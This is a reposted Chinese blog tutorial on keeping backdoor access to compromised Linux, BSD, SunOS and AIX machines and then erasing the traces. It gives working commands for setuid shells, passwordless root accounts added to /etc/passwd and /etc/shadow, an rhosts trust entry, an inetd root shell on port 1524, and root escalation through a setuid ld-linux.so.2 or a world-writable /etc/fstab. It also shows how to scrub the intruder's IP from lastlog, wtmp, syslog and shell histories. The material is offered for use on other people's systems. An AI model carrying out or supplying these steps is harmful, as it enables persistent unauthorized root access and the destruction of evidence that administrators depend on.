linux系统入侵留后门方法+日志清除

1. setuid
#cp /bin/sh /tmp/.sh
#chmod u+s /tmp/.sh
加上 suid 位到shell上,虽然很简单,但容易被发现 

 

2. echo “hack::0:0::/:/bin/csh” >> /etc/passwd
即给系统增加一个 id 为 0(root)的帐号,无口令。
但管理员很快就可以发现哦!

3.echo “++”>>/.rhosts
如果这个系统开了512,513的port呵呵,就可以
把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!

4.修改 sendmail.cf文件 增加一个”wiz” 命令;
然后telnet www.xxx.com 25后,wiz。。。。ok

5. 改已有用户密码

如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码

#passwd 可用passwd命令。

6.rootkit后门

网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!

-Bsd 后门

echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd
/usr/sbin/pwd_mkdb /etc/master.passwd

这里我添加一个love的用户用户的ID是92;ROOT的是0哦!
好了我们添加一个用户了!那么权限不够怎么办呢?
cp /bin/sh /tmp/.x (这个x就是随便选个,好像 .sh , .a , .b 等等)
chmod 777 /tmp/.x
chmod +s /tmp/.x
用这个给他做个小后门
以后我们登陆的这台肉鸡以后就可以用tmp/.x来提升权限了。

-AIX 后门 (Kelvinzhou教我的,感谢你)

echo “ingreslock stream tcp nowait root /bin/sh”>>/tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm /tmp/.x
这样你就可以telnet ip 1524直接得到rootshell

-SunOs 后门

echo “love::0:0::/:/bin/bash” >> /etc/passwd
echo “love::::::::” >> /etc/shadow

当你以telnet上时,你就是root了!不过不保险!

-Linux 后门

echo “love::0:0::/:/bin/bash” >> /etc/passwd
echo “love::::::::” >> /etc/shadow

留了后门就要擦你的PP了,不是吧,这也忘了!

Unix系统日志文件通常是存放在 “/var/log and /var/adm” 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf
一般我们要清除的日志有

lastlog

utmp

wtmp

messages

syslog

sulog

此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history (ksh),.history (csh),或.bash_history (bash)等。

如果你有像wipe.c 那样的清日志的程序,就可以让它来做,不然的话就要手动了! 建议不要用rm掉日志,最好是,把日志改编,

比如:

#cat > /usr/log/lastlog

->这里是你要的写的东西,也可以不输入哦!

^d ->这里的^d是按键 ctrl + d! 结束!

#

剩下的事情:

1、删除我的telnet记录。

2、删除http的日志。

清除日志我使用的办法是:cat xxx |grep -V “IP” >>temp然后在把temp覆盖那些被我修改过的日志文件。

webshell下LINUX提权+留后门

方法一:setuid的方法,其实8是很隐蔽。看看过程:

[root@localdomain lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[root@localdomain lib]# chmod +s ld-linux.so.2
[root@localdomain lib]# ls -l |grep ld-2.7.so
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[root@localdomain lib]#
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。

普通用户登录,测试下权限:

[xiaoyu@localdomain ~]$ whoami
xiaoyu
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`
root
[xiaoyu@localdomain ~]$
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等…OK,不多说了。

方法二:

看过程:

[root@localdomain etc]# chmod a+w /etc/fstab
[root@localdomain etc]#

这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下

[xiaoyu@localdomain ~]$ ls -l /etc/fstab
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab
[xiaoyu@localdomain ~]$ echo ‘test /mnt ext2 user,suid,exec,loop 0 0′ >> /etc/fstab

然后从本机把一个文件到目标机器上去,这里我们命名为test

[xiaoyu@localdomain tmp]$ ls -l test
-rw-rw-r– 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test
[xiaoyu@localdomain tmp]$ mount test
[xiaoyu@localdomain tmp]$ cd /mnt
[xiaoyu@localdomain mnt]$ ls -l
total 18
drwx—— 2 root root 12288 2008-04-20 05:44 lost+found
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root
[xiaoyu@localdomain mnt]$ ./root
sh-3.2#
看到了吧,从普通用户提升到root了。呵呵。
test这个文件baidu貌似木有上传功能撒,木办法传

貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切….


















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/394296,如需转载请自行联系原作者

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值